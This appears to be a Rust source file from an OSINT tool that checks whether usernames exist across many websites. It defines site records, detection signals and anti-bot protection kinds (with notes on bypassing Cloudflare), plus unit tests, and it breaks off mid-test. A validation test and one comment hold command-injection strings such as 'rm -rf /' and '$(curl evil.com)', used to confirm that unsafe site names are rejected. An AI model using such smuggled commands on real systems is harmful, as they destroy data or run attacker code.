adler_core/site.rs
1//! Site definitions and the multi-signal detection model.
2//!
3//! A site is a target URL plus a list of [`Signal`]s. Each signal is an
4//! independent rule that, when triggered against a response, votes either
5//! for the account existing ([`SignalVerdict::Found`]) or not
6//! ([`SignalVerdict::NotFound`]). Non-triggering signals stay silent
7//! ([`SignalVerdict::Ambiguous`]).
8//!
9//! Aggregation is **negative-priority**: if any signal votes
10//! [`SignalVerdict::NotFound`] the verdict is [`MatchKind::NotFound`];
11//! otherwise if any votes [`SignalVerdict::Found`] it is
12//! [`MatchKind::Found`]; with no votes at all it is
13//! [`MatchKind::Uncertain`].
14//!
15//! A `NotFound` vote wins over a `Found` vote because negative signals are
16//! specific (an exact "user not found" message, a 404, a login redirect)
17//! while a bare `200 OK` is weak positive evidence. This matches how
18//! Sherlock-style detectors work: a site that always returns 200 and only
19//! differentiates via an error string is correctly read as `NotFound` when
20//! that string is present, even though the 200 also satisfies a
21//! `StatusFound` signal.
22
23use std::fmt;
24
25use serde::{Deserialize, Serialize};
26
27use crate::access::AccessPolicy;
28use crate::check::MatchKind;
29use crate::error::{Error, Result};
30use crate::username::Username;
31
32/// One site we can probe for the existence of an account.
33#[derive(Debug, Clone, Serialize, Deserialize)]
34pub struct Site {
35 /// Human-readable site name. Doubles as the stable filter key
36 /// (case-insensitive) used by CLI `--only` / `--exclude`.
37 pub name: String,
38 /// URL template containing a `{username}` placeholder.
39 pub url: UrlTemplate,
40 /// Ordered list of detection signals. Aggregated per the type-level docs.
41 /// Optional in source JSON when [`Site::engine`] is set — the engine's
42 /// signals are inherited at load time. After
43 /// [`crate::Registry`] resolution this vec is always non-empty (or the
44 /// site fails `validate`).
45 #[serde(default, skip_serializing_if = "Vec::is_empty")]
46 pub signals: Vec<Signal>,
47 /// One or more usernames known to exist on this site. Consumed by
48 /// `adler doctor` to verify the signal list still reports `Found`
49 /// for a real account. Accepts either a single string or an array
50 /// of strings in JSON; the doctor probes each in declaration order
51 /// and passes the present-check if **any** one of them resolves to
52 /// `Found`. Listing several is defensive — brand accounts or other
53 /// users that the site special-cases (e.g. Instagram's own
54 /// `instagram` account) shouldn't false-fail the whole site.
55 #[serde(default, skip_serializing_if = "Option::is_none")]
56 pub known_present: Option<KnownPresent>,
57 /// Username known to *not* exist on this site (optional). When omitted,
58 /// the doctor generates a random nonsense username instead.
59 #[serde(default, skip_serializing_if = "Option::is_none")]
60 pub known_absent: Option<String>,
61 /// Optional CSS-selector rules for pulling profile fields (name, bio,
62 /// avatar, …) out of a `Found` page. Only applied under `--enrich`.
63 #[serde(default, skip_serializing_if = "Vec::is_empty")]
64 pub extract: Vec<Extractor>,
65 /// Free-form classification tags for scanning a subset of the registry,
66 /// e.g. `"social"`, `"dev"`, `"region:ru"`. Matched by CLI `--tag`.
67 /// A site with no tags is universal (included unless a `--tag` filter
68 /// excludes it). Conventionally lowercase; `axis:value` is just a naming
69 /// convention, not enforced.
70 #[serde(default, skip_serializing_if = "Vec::is_empty")]
71 pub tags: Vec<String>,
72 /// Extra HTTP headers to send with the probe (e.g.
73 /// `{"X-IG-App-ID": "936619743392459"}` to unlock Instagram's
74 /// `web_profile_info` endpoint, or a custom `User-Agent`). Browser
75 /// backends apply them via `Network.setExtraHTTPHeaders` before
76 /// navigation; the raw-HTTP path doesn't read this yet.
77 #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
78 pub request_headers: std::collections::BTreeMap<String, String>,
79 /// Optional regular expression describing usernames a site will
80 /// accept. When set and the scanned username doesn't match, the
81 /// site is skipped (the outcome is reported as `Uncertain` with
82 /// reason `UsernameNotAllowed`, without issuing any HTTP request).
83 /// Saves work AND avoids the false-positive class where a site
84 /// 404s on illegal usernames in ways our signal can't tell apart
85 /// from a missing account.
86 ///
87 /// Imported from Sherlock's `regexCheck` field; 95+ sites
88 /// upstream carry one (length bounds, character classes, etc.).
89 /// Validation at load time compiles the regex with `regex::Regex`
90 /// — a malformed pattern rejects the site rather than silently
91 /// degrading at scan time.
92 #[serde(default, skip_serializing_if = "Option::is_none")]
93 pub regex_check: Option<String>,
94 /// Name of a shared [`Engine`] this site inherits from (e.g.
95 /// `"Discourse"`, `"vBulletin"`). Forum-software platforms host
96 /// thousands of instances with identical detection signatures;
97 /// defining the signature once on an engine and inheriting it
98 /// keeps the registry small and the cost of a platform-wide
99 /// HTML change one fix instead of hundreds.
100 ///
101 /// At registry-load time the engine fields are merged *under* the
102 /// site's own — anything the site declares explicitly (`signals`,
103 /// `request_headers`, `regex_check`) wins on
104 /// conflict; anything left empty / unset is filled from the
105 /// engine. An `engine: "X"` referring to a non-existent X is a
106 /// load-time error.
107 #[serde(default, skip_serializing_if = "Option::is_none")]
108 pub engine: Option<String>,
109 /// Characters the site silently drops from the username server-side
110 /// before matching — `john.doe` and `johndoe` resolve to the same
111 /// account on a site that lists `strip_bad_char: "."`. We pre-strip
112 /// at probe time so the URL we issue matches the canonical form
113 /// the site uses, avoiding a false `NotFound` on a benign
114 /// punctuation variant. Mirrors `WhatsMyName`'s field of the same
115 /// name; carried verbatim through `scripts/import_whatsmyname.py`.
116 #[serde(default, skip_serializing_if = "Option::is_none")]
117 pub strip_bad_char: Option<String>,
118 /// HTTP method used to probe this site. Defaults to GET — the vast
119 /// majority of sites are GET-probed. A few (Anilist's GraphQL API,
120 /// some Discord/Holopin endpoints) only answer to POST.
121 #[serde(default, skip_serializing_if = "is_default_method")]
122 pub request_method: HttpMethod,
123 /// Request body to send when [`Site::request_method`] is POST. The
124 /// literal `{username}` placeholder is substituted with the probe
125 /// username (same as URL templates). For GraphQL endpoints this
126 /// is typically the JSON `{"query":"...","variables":{"name":"{username}"}}`.
127 #[serde(default, skip_serializing_if = "Option::is_none")]
128 pub request_body: Option<String>,
129 /// Specific anti-bot mechanisms the site is known to deploy. A
130 /// richer alternative to the flat `bot-protected` tag — knowing
131 /// *which* protection a site uses lets future routing pick the
132 /// right backend (`Cloudflare` → cloudscraper-style bypass,
133 /// `CfFirewall` → full browser, `UserAuth` → skip, …) instead
134 /// of the all-or-nothing `bot-protected` decision.
135 ///
136 /// Independent of [`Site::tags`]: the existing `bot-protected`
137 /// tag stays as a back-compat shorthand and routes through the
138 /// browser backend exactly as before. When this vector is
139 /// non-empty Adler also treats the site as bot-protected
140 /// regardless of the tag.
141 #[serde(default, skip_serializing_if = "Vec::is_empty")]
142 pub protection: Vec<ProtectionKind>,
143 /// Disable the site without removing it from the registry.
144 /// Disabled sites are skipped by [`crate::Registry::filter`] —
145 /// they don't get probed, don't appear in `--list-sites`, and
146 /// don't count toward the doctor's tally. Useful for parking
147 /// known-broken entries with a reason comment instead of
148 /// deleting them outright, so a future contributor can re-enable
149 /// the entry by flipping the flag once they've authored a
150 /// working signature.
151 #[serde(default, skip_serializing_if = "std::ops::Not::not")]
152 pub disabled: bool,
153 /// Free-form annotation explaining why a [`Site::disabled`] entry
154 /// was parked. The Rust runtime doesn't act on it — the JSON
155 /// loader, scan path and doctor all just look at `disabled` — but
156 /// downstream tooling (`scripts/doctor_aggregate.py`, ad-hoc
157 /// audits) and human maintainers reading `sites.json` directly
158 /// rely on it to tell categories apart at-a-glance:
159 /// `duplicate of <canonical>`, `Honest Limits: …`, `doctor: 3+
160 /// consecutive structural failures`, etc. Optional; only meaningful
161 /// when `disabled` is also `true`.
162 #[serde(default, skip_serializing_if = "Option::is_none")]
163 pub disabled_reason: Option<String>,
164 /// Canonical-source link for mirror-style sites. When a site is
165 /// a mirror of another (e.g. Nitter ↔ Twitter, Invidious ↔
166 /// `YouTube`), `source` carries the name of the primary site this
167 /// one mirrors. Lets future UX surface "Twitter is offline,
168 /// here's the same account on Nitter" without hand-curated
169 /// linkage. Empty / `None` for canonical sites and sites with
170 /// no known mirror relationship.
171 #[serde(default, skip_serializing_if = "Option::is_none")]
172 pub source: Option<String>,
173 /// Approximate popularity rank — lower numbers are more popular.
174 /// Used by `adler --top N` to scan only the most-popular N sites
175 /// (useful for fast checks of high-signal targets). Ranks are
176 /// curated, not derived from traffic data: the seed set covers
177 /// well-known OSINT-relevant sites where most users have
178 /// accounts. Sites without a rank are skipped by `--top N`.
179 #[serde(default, skip_serializing_if = "Option::is_none")]
180 pub popularity: Option<u32>,
181 /// Egress requirement for reaching this site — country and/or IP
182 /// type the probe must exit from (see [`AccessPolicy`]). Default
183 /// (empty) means no special routing: the request uses the client's
184 /// default egress. When constrained and no configured egress fits,
185 /// the probe is reported `Uncertain(GeoUnavailable)` rather than
186 /// fetched from the wrong location.
187 #[serde(default, skip_serializing_if = "AccessPolicy::is_default")]
188 pub access: AccessPolicy,
189}
190
191/// A specific anti-bot mechanism a site is known to deploy. Used to
192/// route probes to the right backend (raw HTTP, cloudscraper, full
193/// browser) and to inform users what blocks reliable detection.
194#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
195#[serde(rename_all = "kebab-case")]
196#[non_exhaustive]
197pub enum ProtectionKind {
198 /// Standard Cloudflare WAF — challenge pages, `cf_clearance`
199 /// cookie. Bypassable by cloudscraper-style HTTP-level solvers
200 /// (e.g. `FlareSolverr`) without a full browser.
201 Cloudflare,
202 /// AWS `CloudFront` edge protection. Often UA-strictness only.
203 Cloudfront,
204 /// `DDoS-Guard` (used by some Russian/CIS hosts). Similar
205 /// challenge model to Cloudflare.
206 DdosGuard,
207 /// Cloudflare's JS-challenge ("I am under attack" mode).
208 /// Needs a JS-executing backend.
209 CfJsChallenge,
210 /// Cloudflare's WAF firewall blocking by signature, requiring
211 /// a real browser fingerprint to clear.
212 CfFirewall,
213 /// JA3/JA4 TLS-fingerprint matching (servers that classify the
214 /// client by its TLS handshake shape, not its UA).
215 TlsFingerprint,
216 /// `Anubis` proof-of-work challenge. Used by codeberg + a
217 /// growing number of FOSS projects to discourage scraping.
218 Anubis,
219 /// Generic captcha challenge (hCaptcha, reCAPTCHA, …). Almost
220 /// always blocking — `Uncertain` is the honest answer.
221 Captcha,
222 /// Trivial UA-strictness: rejects unknown User-Agent strings
223 /// but lets through a real-browser UA. Cheapest to bypass.
224 UserAgent,
225 /// Endpoint requires authentication; no anonymous probe path
226 /// exists. Practically unscrapable for OSINT.
227 UserAuth,
228}
229
230/// HTTP method used to probe a site. Only GET and POST are supported.
231#[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize)]
232#[serde(rename_all = "UPPERCASE")]
233pub enum HttpMethod {
234 /// Standard GET — the default for ~99% of sites in the registry.
235 #[default]
236 Get,
237 /// POST — for API endpoints that only differentiate accounts via a
238 /// body payload (GraphQL queries, form submissions). Pair with
239 /// [`Site::request_body`].
240 Post,
241}
242
243/// serde's `skip_serializing_if` callback contract requires a
244/// reference, so the by-value lint on a 1-byte type doesn't apply.
245#[allow(clippy::trivially_copy_pass_by_ref)]
246fn is_default_method(m: &HttpMethod) -> bool {
247 matches!(m, HttpMethod::Get)
248}
249
250/// Shared detection signature template for a family of sites that
251/// run the same forum / blog / wiki software (Discourse, vBulletin,
252/// `XenForo`, `MediaWiki`, …). Referenced from [`Site::engine`].
253///
254/// Engines carry the same kinds of fields as a [`Site`] does (just
255/// the inheritable ones — there's no per-engine `url`, that comes
256/// from the site itself). At registry load, the engine's fields
257/// are merged *under* each referring site's own fields: site wins
258/// on conflict.
259#[derive(Debug, Clone, Default, Serialize, Deserialize)]
260#[non_exhaustive]
261pub struct Engine {
262 /// Default detection signals for sites of this family.
263 /// Inherited only when the site itself declares no `signals`.
264 #[serde(default, skip_serializing_if = "Vec::is_empty")]
265 pub signals: Vec<Signal>,
266 /// Default extra HTTP headers (e.g. a User-Agent that the
267 /// platform accepts where the browser default gets blocked).
268 /// Merged with the site's own headers; site wins per-key.
269 #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
270 pub request_headers: std::collections::BTreeMap<String, String>,
271 /// Default username-validity regex inherited only when the site
272 /// itself doesn't declare one.
273 #[serde(default, skip_serializing_if = "Option::is_none")]
274 pub regex_check: Option<String>,
275}
276
277impl Engine {
278 /// Compile-check the engine's own constraints — the inheritable
279 /// fields are subject to the same validation as a site's would
280 /// be.
281 ///
282 /// # Errors
283 /// Returns [`Error::InvalidSite`] when the engine name is
284 /// empty, a signal carries an empty marker, or any other
285 /// constraint a [`Site::validate`] would also flag.
286 pub fn validate(&self, name: &str) -> Result<()> {
287 if name.trim().is_empty() {
288 return Err(Error::InvalidSite {
289 reason: "engine name is empty".into(),
290 });
291 }
292 for signal in &self.signals {
293 signal.validate().map_err(|reason| Error::InvalidSite {
294 reason: format!("engine {name:?}: {reason}"),
295 })?;
296 }
297 if let Some(pat) = &self.regex_check {
298 if let Err(err) = regex::Regex::new(pat) {
299 // The Rust `regex` crate refuses look-around for DoS
300 // reasons; some upstream registries (Sherlock, WMN)
301 // ship patterns that need it. Downgraded from WARN to
302 // DEBUG: it's a known structural limit, the probe
303 // path falls back gracefully, and the noise dominated
304 // CLI startup.
305 tracing::debug!(
306 engine = %name, pattern = %pat, error = %err,
307 "engine regex_check did not compile; gate disabled for inheriting sites",
308 );
309 }
310 }
311 Ok(())
312 }
313
314 /// Fill the inheritable empty / unset fields of `site` from
315 /// this engine. Site fields are authoritative: if the site has
316 /// any signals at all, no engine signals are merged in.
317 /// `request_headers` merge per-key (site wins on per-key
318 /// conflict).
319 pub fn merge_into(&self, site: &mut Site) {
320 if site.signals.is_empty() {
321 site.signals.clone_from(&self.signals);
322 }
323 for (k, v) in &self.request_headers {
324 site.request_headers
325 .entry(k.clone())
326 .or_insert_with(|| v.clone());
327 }
328 if site.regex_check.is_none() {
329 site.regex_check.clone_from(&self.regex_check);
330 }
331 }
332}
333
334/// Known-present declaration on a [`Site`].
335///
336/// In JSON this is `untagged`: a plain string `"torvalds"` deserialises
337/// into [`KnownPresent::Single`], an array `["torvalds", "leomessi"]`
338/// into [`KnownPresent::Multiple`]. Serialisation preserves the form
339/// the site was authored with, so single-username entries stay
340/// compact.
341#[derive(Debug, Clone, Serialize, Deserialize)]
342#[serde(untagged)]
343#[non_exhaustive]
344pub enum KnownPresent {
345 /// Exactly one candidate username.
346 Single(String),
347 /// Two or more candidate usernames. Doctor passes if any resolve
348 /// to `Found`.
349 Multiple(Vec<String>),
350}
351
352impl KnownPresent {
353 /// View all candidate usernames as a slice, in declaration order.
354 /// Always non-empty for `Single`; may be empty for a hand-authored
355 /// `Multiple([])` (validation rejects that).
356 pub fn as_slice(&self) -> &[String] {
357 match self {
358 Self::Single(s) => std::slice::from_ref(s),
359 Self::Multiple(v) => v.as_slice(),
360 }
361 }
362
363 /// Primary candidate — the first declared username. `Single`
364 /// always has one; `Multiple` may be empty if a contributor wrote
365 /// `[]` (caught by [`Site::validate`]).
366 pub fn primary(&self) -> Option<&str> {
367 self.as_slice().first().map(String::as_str)
368 }
369}
370
371impl From<&str> for KnownPresent {
372 fn from(s: &str) -> Self {
373 Self::Single(s.to_owned())
374 }
375}
376
377impl From<String> for KnownPresent {
378 fn from(s: String) -> Self {
379 Self::Single(s)
380 }
381}
382
383/// Upper bound on a site name's length. Names appear in CLI output,
384/// CSV columns, and the validate-sites.yml workflow's run-summary
385/// table — keeping them short avoids both UI breakage and
386/// pathological CI artefacts.
387const NAME_MAX_LEN: usize = 80;
388
389/// True when `name` consists only of characters safe to interpolate
390/// into shell, CSV, and CLI argument contexts. Matches the JSON
391/// Schema pattern `^[\w][\w .()!/+-]*$`.
392fn is_safe_site_name(name: &str) -> bool {
393 let mut chars = name.chars();
394 match chars.next() {
395 Some(c) if c.is_ascii_alphanumeric() || c == '_' => {}
396 _ => return false,
397 }
398 chars.all(|c| {
399 c.is_ascii_alphanumeric()
400 || c == '_'
401 || c == ' '
402 || matches!(c, '.' | '(' | ')' | '!' | '/' | '+' | '-')
403 })
404}
405
406/// A rule for extracting one profile field from a page.
407#[derive(Debug, Clone, Serialize, Deserialize)]
408pub struct Extractor {
409 /// Output field name, e.g. `"avatar"`, `"bio"`, `"name"`.
410 pub field: String,
411 /// CSS selector locating the element.
412 pub selector: String,
413 /// Attribute to read (e.g. `"src"`, `"content"`). When omitted, the
414 /// element's trimmed text content is used.
415 #[serde(default, skip_serializing_if = "Option::is_none")]
416 pub attr: Option<String>,
417}
418
419impl Site {
420 /// Render the site URL for a given username.
421 ///
422 /// If the site declares [`strip_bad_char`](Site::strip_bad_char),
423 /// those characters are removed from `username` before
424 /// substitution — so a `john.doe` probe against a site that
425 /// lists `strip_bad_char: "."` actually hits the URL for
426 /// `johndoe`, matching the canonical form the site stores
427 /// internally.
428 pub fn url_for(&self, username: &Username) -> String {
429 let raw = username.as_str();
430 match self.strip_bad_char.as_deref() {
431 Some(chars) if !chars.is_empty() && raw.chars().any(|c| chars.contains(c)) => {
432 let stripped: String = raw.chars().filter(|c| !chars.contains(*c)).collect();
433 self.url.substitute(&stripped)
434 }
435 _ => self.url.substitute(raw),
436 }
437 }
438
439 /// Validate semantic invariants the type system can't enforce
440 /// (empty signals list, empty markers, empty status code sets).
441 pub fn validate(&self) -> Result<()> {
442 if self.name.trim().is_empty() {
443 return Err(Error::InvalidSite {
444 reason: "site name is empty".into(),
445 });
446 }
447 // Site names doubled as shell-interpolation values in the
448 // `validate-sites.yml` PR gate; an unsanitised name like
449 // `Foo"; rm -rf /; #` would have broken out of `"$name"`
450 // quoting and run arbitrary commands on the runner. Both the
451 // JSON Schema and this Rust loader enforce a safe character
452 // class (word chars plus a few visual punctuation marks) at
453 // every entry point.
454 if self.name.len() > NAME_MAX_LEN {
455 return Err(Error::InvalidSite {
456 reason: format!(
457 "site name longer than {NAME_MAX_LEN} chars: {:?}",
458 self.name
459 ),
460 });
461 }
462 if !is_safe_site_name(&self.name) {
463 return Err(Error::InvalidSite {
464 reason: format!(
465 "site name {:?} contains characters outside the allowed \
466 set (word chars, space, `.()!/+-`)",
467 self.name
468 ),
469 });
470 }
471 if self.signals.is_empty() {
472 return Err(Error::InvalidSite {
473 reason: format!("site {:?}: signals list is empty", self.name),
474 });
475 }
476 for signal in &self.signals {
477 signal.validate().map_err(|reason| Error::InvalidSite {
478 reason: format!("site {:?}: {reason}", self.name),
479 })?;
480 }
481 for extractor in &self.extract {
482 if extractor.field.trim().is_empty() {
483 return Err(Error::InvalidSite {
484 reason: format!("site {:?}: extractor has an empty field name", self.name),
485 });
486 }
487 if scraper::Selector::parse(&extractor.selector).is_err() {
488 return Err(Error::InvalidSite {
489 reason: format!(
490 "site {:?}: invalid CSS selector {:?} for field {:?}",
491 self.name, extractor.selector, extractor.field
492 ),
493 });
494 }
495 }
496 if let Some(pat) = &self.regex_check {
497 if let Err(err) = regex::Regex::new(pat) {
498 // Sherlock's regexes occasionally use lookarounds
499 // (e.g. `(?![.-])`), which the Rust `regex` crate
500 // doesn't support — it's a true regular-language
501 // engine for performance + DoS safety. Rather than
502 // reject the whole site over a username-gate the
503 // probe path will simply skip and let the site keep
504 // working at the cost of one wasted probe per
505 // illegal username. Logged at DEBUG (not WARN) — it's
506 // a known structural limit, ~8 sites in the embedded
507 // registry need look-around. The noise dominated CLI
508 // startup; set `ADLER_LOG=debug` to see them again.
509 tracing::debug!(
510 site = %self.name, pattern = %pat, error = %err,
511 "regex_check did not compile; username-gate disabled for this site",
512 );
513 }
514 }
515 if let Some(kp) = &self.known_present {
516 if kp.as_slice().is_empty() {
517 return Err(Error::InvalidSite {
518 reason: format!("site {:?}: known_present is an empty list", self.name),
519 });
520 }
521 for name in kp.as_slice() {
522 if name.trim().is_empty() {
523 return Err(Error::InvalidSite {
524 reason: format!(
525 "site {:?}: known_present contains an empty username",
526 self.name
527 ),
528 });
529 }
530 }
531 }
532 for tag in &self.tags {
533 if tag.trim().is_empty() {
534 return Err(Error::InvalidSite {
535 reason: format!("site {:?}: tag is empty", self.name),
536 });
537 }
538 }
539 Ok(())
540 }
541}
542
543/// URL template containing a `{username}` placeholder.
544///
545/// Validated at construction: must contain the placeholder and start with
546/// `http://` or `https://`.
547#[derive(Debug, Clone, PartialEq, Eq)]
548pub struct UrlTemplate(String);
549
550const PLACEHOLDER: &str = "{username}";
551
552impl UrlTemplate {
553 /// Build a template, validating placeholder and scheme.
554 pub fn new(template: impl Into<String>) -> Result<Self> {
555 let t = template.into();
556 if !t.contains(PLACEHOLDER) {
557 return Err(Error::InvalidSite {
558 reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
559 });
560 }
561 if !(t.starts_with("http://") || t.starts_with("https://")) {
562 return Err(Error::InvalidSite {
563 reason: format!("url template must start with http(s)://: {t:?}"),
564 });
565 }
566 Ok(Self(t))
567 }
568
569 fn substitute(&self, username: &str) -> String {
570 self.0.replace(PLACEHOLDER, username)
571 }
572
573 /// Borrow the raw template (with placeholder).
574 pub fn as_str(&self) -> &str {
575 &self.0
576 }
577}
578
579impl fmt::Display for UrlTemplate {
580 fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
581 f.write_str(&self.0)
582 }
583}
584
585impl Serialize for UrlTemplate {
586 fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
587 self.0.serialize(s)
588 }
589}
590
591impl<'de> Deserialize<'de> for UrlTemplate {
592 fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
593 let raw = String::deserialize(d)?;
594 Self::new(raw).map_err(serde::de::Error::custom)
595 }
596}
597
598/// A single piece of evidence about whether an account exists.
599///
600/// Signals are tagged in JSON by their `kind`. New variants will land for
601/// Phase 2 length-baseline scoring; the enum is `#[non_exhaustive]` so
602/// adding variants is not a breaking change.
603#[derive(Debug, Clone, Serialize, Deserialize)]
604#[serde(tag = "kind", rename_all = "snake_case")]
605#[non_exhaustive]
606pub enum Signal {
607 /// Votes **`Found`** when the response status is in `codes`.
608 StatusFound {
609 /// Status codes that vote for existence. Must be non-empty.
610 codes: Vec<u16>,
611 },
612 /// Votes **`NotFound`** when the response status is in `codes`.
613 StatusNotFound {
614 /// Status codes that vote for non-existence. Must be non-empty.
615 codes: Vec<u16>,
616 },
617 /// Votes **`Found`** when the response body contains `text`.
618 BodyPresent {
619 /// Substring whose appearance votes for existence. Must be non-empty.
620 text: String,
621 },
622 /// Votes **`NotFound`** when the response body contains `text`.
623 BodyAbsent {
624 /// Substring whose appearance votes for non-existence (e.g.
625 /// `"Profile not found"`). Must be non-empty.
626 text: String,
627 },
628 /// Votes **`NotFound`** when the final URL (post-redirect) contains
629 /// `fragment`.
630 RedirectAbsent {
631 /// Substring that, when present in the final URL, indicates the
632 /// account is missing (typically `"/login"` or `"/404"`). Must be
633 /// non-empty.
634 fragment: String,
635 },
636}
637
638/// Probe data extracted from an HTTP response, fed to each [`Signal`].
639///
640/// Internal detection plumbing — not part of the public API.
641#[derive(Debug)]
642pub(crate) struct Probe<'a> {
643 /// HTTP status code.
644 pub(crate) status: u16,
645 /// Final URL after redirects.
646 pub(crate) final_url: &'a str,
647 /// Decoded response body. Empty string when no body-using signal is configured.
648 pub(crate) body: &'a str,
649}
650
651/// What one signal concluded after looking at a probe.
652#[derive(Debug, Clone, Copy, PartialEq, Eq)]
653pub(crate) enum SignalVerdict {
654 /// This signal votes that the account exists.
655 Found,
656 /// This signal votes that the account does not exist.
657 NotFound,
658 /// This signal had nothing to say (its trigger condition didn't match).
659 Ambiguous,
660}
661
662impl Signal {
663 /// True if this signal needs to inspect the response body. Used by the
664 /// client to skip body reads when no signal requires them.
665 pub(crate) fn needs_body(&self) -> bool {
666 matches!(self, Self::BodyPresent { .. } | Self::BodyAbsent { .. })
667 }
668
669 /// Evaluate this signal against a probe and produce a vote.
670 pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
671 match self {
672 Self::StatusFound { codes } => {
673 if codes.contains(&probe.status) {
674 SignalVerdict::Found
675 } else {
676 SignalVerdict::Ambiguous
677 }
678 }
679 Self::StatusNotFound { codes } => {
680 if codes.contains(&probe.status) {
681 SignalVerdict::NotFound
682 } else {
683 SignalVerdict::Ambiguous
684 }
685 }
686 Self::BodyPresent { text } => {
687 if probe.body.contains(text.as_str()) {
688 SignalVerdict::Found
689 } else {
690 SignalVerdict::Ambiguous
691 }
692 }
693 Self::BodyAbsent { text } => {
694 if probe.body.contains(text.as_str()) {
695 SignalVerdict::NotFound
696 } else {
697 SignalVerdict::Ambiguous
698 }
699 }
700 Self::RedirectAbsent { fragment } => {
701 if probe.final_url.contains(fragment.as_str()) {
702 SignalVerdict::NotFound
703 } else {
704 SignalVerdict::Ambiguous
705 }
706 }
707 }
708 }
709
710 /// Human-readable description of why this signal fired against `probe`,
711 /// for verdict explainability. Only meaningful for a signal that voted
712 /// (i.e. didn't return [`SignalVerdict::Ambiguous`]); the caller filters.
713 pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
714 match self {
715 Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
716 Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
717 Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
718 Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
719 Self::RedirectAbsent { fragment } => {
720 format!("final URL contains {fragment:?} (redirect_absent)")
721 }
722 }
723 }
724
725 fn validate(&self) -> std::result::Result<(), String> {
726 match self {
727 Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
728 if codes.is_empty() {
729 return Err("status signal codes list is empty".into());
730 }
731 }
732 Self::BodyPresent { text } | Self::BodyAbsent { text } => {
733 if text.is_empty() {
734 return Err("body signal text is empty".into());
735 }
736 }
737 Self::RedirectAbsent { fragment } => {
738 if fragment.is_empty() {
739 return Err("redirect signal fragment is empty".into());
740 }
741 }
742 }
743 Ok(())
744 }
745}
746
747/// Aggregate per-signal verdicts into a final [`MatchKind`].
748///
749/// Negative-priority counting: any `NotFound` vote → `NotFound`; otherwise
750/// any `Found` vote → `Found`; no votes at all → `Uncertain`. See the module
751/// docs for why a `NotFound` vote outranks a `Found` vote.
752pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
753where
754 I: IntoIterator<Item = SignalVerdict>,
755{
756 let mut found = false;
757 let mut not_found = false;
758 for v in verdicts {
759 match v {
760 SignalVerdict::Found => found = true,
761 SignalVerdict::NotFound => not_found = true,
762 SignalVerdict::Ambiguous => {}
763 }
764 }
765 if not_found {
766 MatchKind::NotFound
767 } else if found {
768 MatchKind::Found
769 } else {
770 MatchKind::Uncertain
771 }
772}
773
774#[cfg(test)]
775mod tests {
776 use super::*;
777
778 fn site_with(signals: Vec<Signal>) -> Site {
779 Site {
780 name: "Example".into(),
781 url: UrlTemplate::new("https://example.com/{username}").unwrap(),
782 signals,
783 known_present: None,
784 known_absent: None,
785 extract: Vec::new(),
786 tags: Vec::new(),
787 request_headers: std::collections::BTreeMap::new(),
788 regex_check: None,
789 engine: None,
790 strip_bad_char: None,
791 request_method: crate::site::HttpMethod::Get,
792 request_body: None,
793 protection: Vec::new(),
794 disabled: false,
795 disabled_reason: None,
796 source: None,
797 popularity: None,
798 access: crate::AccessPolicy::default(),
799 }
800 }
801
802 #[test]
803 fn url_template_substitutes_placeholder() {
804 let user = Username::new("alice").unwrap();
805 let site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
806 assert_eq!(site.url_for(&user), "https://example.com/alice");
807 }
808
809 #[test]
810 fn url_for_strips_bad_chars_before_substitution() {
811 let user = Username::new("john.doe").unwrap();
812 let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
813 site.strip_bad_char = Some(".".into());
814 assert_eq!(site.url_for(&user), "https://example.com/johndoe");
815 }
816
817 #[test]
818 fn url_for_strip_bad_char_noop_when_no_match() {
819 let user = Username::new("alice").unwrap();
820 let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
821 site.strip_bad_char = Some(".".into());
822 assert_eq!(site.url_for(&user), "https://example.com/alice");
823 }
824
825 #[test]
826 fn url_template_rejects_missing_placeholder() {
827 assert!(UrlTemplate::new("https://example.com/users/").is_err());
828 }
829
830 #[test]
831 fn url_template_rejects_bad_scheme() {
832 assert!(UrlTemplate::new("ftp://example.com/{username}").is_err());
833 }
834
835 #[test]
836 fn validate_requires_non_empty_signals() {
837 let err = site_with(vec![]).validate().unwrap_err();
838 assert!(err.to_string().contains("signals list is empty"));
839 }
840
841 #[test]
842 fn validate_rejects_empty_status_codes() {
843 let err = site_with(vec![Signal::StatusFound { codes: vec![] }])
844 .validate()
845 .unwrap_err();
846 assert!(err.to_string().contains("status signal"));
847 }
848
849 #[test]
850 fn validate_rejects_empty_body_text() {
851 let err = site_with(vec![Signal::BodyAbsent {
852 text: String::new(),
853 }])
854 .validate()
855 .unwrap_err();
856 assert!(err.to_string().contains("body signal"));
857 }
858
859 #[test]
860 fn validate_rejects_empty_redirect_fragment() {
861 let err = site_with(vec![Signal::RedirectAbsent {
862 fragment: String::new(),
863 }])
864 .validate()
865 .unwrap_err();
866 assert!(err.to_string().contains("redirect signal"));
867 }
868
869 #[test]
870 fn validate_rejects_shell_metacharacters_in_name() {
871 // The validate-sites.yml workflow used to inject `--only "$name"`
872 // where `$name` came from PR-controlled sites.json. A name like
873 // `Foo"; rm -rf /; #` would have broken out of `"..."` quoting
874 // and executed on the runner. Schema + this loader both enforce
875 // a safe character class; verify a representative selection of
876 // dangerous chars is rejected.
877 for bad in [
878 "Foo\"; rm -rf /; #",
879 "Bar$(curl evil.com)",
880 "Baz`whoami`",
881 "Qux\\nfoo",
882 "back\\slash",
883 "pipe|ish",
884 "semi;colon",
885 "amp&and",
886 "lt<gt>",
887 ] {
888 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
889 s.name = bad.into();
890 let err = s.validate().unwrap_err();
891 assert!(
892 err.to_string()
